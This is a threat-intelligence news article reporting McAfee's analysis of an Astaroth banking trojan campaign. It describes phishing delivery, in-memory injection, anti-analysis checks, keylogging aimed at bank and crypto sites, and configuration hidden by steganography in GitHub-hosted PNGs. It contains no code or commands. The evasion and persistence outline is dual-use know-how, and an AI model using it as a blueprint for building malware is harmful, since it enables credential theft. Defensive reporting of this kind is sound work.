Astaroth Malware Uses Steganography in GitHub Images for Covert C2 Backup
McAfee researchers have reported a renewed campaign by the banking trojan Astaroth, which has begun abusing GitHub as a resilient channel for delivering configuration data. By leveraging a legitimate platform in this way, attackers can retain control of compromised machines even after primary command-and-control servers are taken down, markedly increasing the malware’s survivability and complicating remediation efforts.
The intrusion chain begins with a phishing message masquerading as a notification from familiar services such as DocuSign or as an ostensibly legitimate résumé. The email contains a link to a ZIP archive; inside lies a Windows shortcut (.lnk) that invokes hidden JavaScript via mshta.exe. That script fetches a secondary payload from a remote host whose access is geographically filtered — the malicious bundle is downloaded only on machines located within the attackers’ target regions.
The retrieved package includes an AutoIt script and interpreter, an encrypted payload body, and a separate configuration file. The script unfolds shellcode in memory and injects a DLL into RegSvc.exe, employing anti-analysis techniques and API shimming to evade detection by replacing calls to kernel32.dll. The deployed module, authored in Delphi, performs exhaustive environmental checks and aborts execution if it detects a sandbox, debugger, or an English-language locale.
Astaroth continuously monitors the foreground windows. When a user visits online banking or cryptocurrency sites, the trojan activates a keylogger that captures keystrokes, keyed to window class names such as chrome, mozilla, ieframe and the like. Target lists include major Brazilian banks and a slew of crypto services — Binance, MetaMask, Etherscan, and LocalBitcoins among them. Exfiltrated credentials and data are relayed to the operators via a proprietary protocol or tunneled through reverse-proxy services like ngrok.
A distinguishing feature of this campaign is Astaroth’s use of GitHub-hosted PNG images as a fallback configuration channel. Every two hours the trojan downloads a PNG from a public repository; the image conceals an encrypted configuration via steganography. McAfee found repositories following predictable naming schemes and coordinated their removal with platform administrators, but the technique exemplifies how legitimate infrastructure can be repurposed as a covert update mechanism for malware.
To establish persistence, the trojan drops a shortcut into the startup folder so it launches automatically with each system boot. Despite the technical sophistication of the attack chain, the initial infection vector remains social engineering — exploitation of user trust in email and attachments.
McAfee stresses that campaigns of this kind underscore the urgency of stricter controls over content and artifacts on public code hosting services, since threat actors increasingly exploit such platforms to bypass conventional blocking mechanisms. The company has shared details of the malicious repositories with GitHub; those repositories were promptly removed, temporarily disrupting Astaroth’s update channel.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
